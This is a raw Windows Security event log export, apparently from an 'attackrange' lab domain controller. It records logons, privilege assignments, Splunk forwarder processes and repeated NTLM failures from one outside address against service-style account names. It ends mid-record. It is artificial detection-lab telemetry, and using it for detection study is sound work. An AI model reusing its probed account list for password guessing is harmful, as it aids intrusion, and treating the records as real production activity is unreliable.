EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264977
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C629
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264976
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89C5E1
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264975
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C5E1
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264974
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89C4F3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53878
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264973
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89C4F3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:49:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264986
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264987
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: PAADMIN
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.250
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:12 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264988
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SQLAGENT
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.250
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264989
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264991
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264990
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1888
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:49:19 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264992
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89CAE1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:23 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264993
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Type: 3
Account For Which Logon Failed:
Security ID: NULL SID
Account Name: SAAZDEPUSR
Account Domain:
Failure Information:
Failure Reason: Unknown user name or bad password.
Status: 0xC000006D
Sub Status: 0xC0000064
Process Information:
Caller Process ID: 0x0
Caller Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 176.111.173.250
Source Port: 0
Detailed Authentication Information:
Logon Process: NtLmSsp
Authentication Package: NTLM
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon request fails. It is generated on the computer where access was attempted.
The Subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The Logon Type field indicates the kind of logon that was requested. The most common types are 2 (interactive) and 3 (network).
The Process Information fields indicate which account and process on the system requested the logon.
The Network Information fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The authentication information fields provide detailed information about this specific logon request.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264996
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89FAC6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:49:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264995
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x89FAC6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53891
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:49:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264994
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x89FAC6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:50:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264997
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a84
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264999
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1674
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264998
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1208
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265000
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x158c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265001
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcd4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265003
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x74c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265002
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf70
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:50:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4625
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265004
Keywords=Audit Failure
Message=An account failed to log on.
Subject:
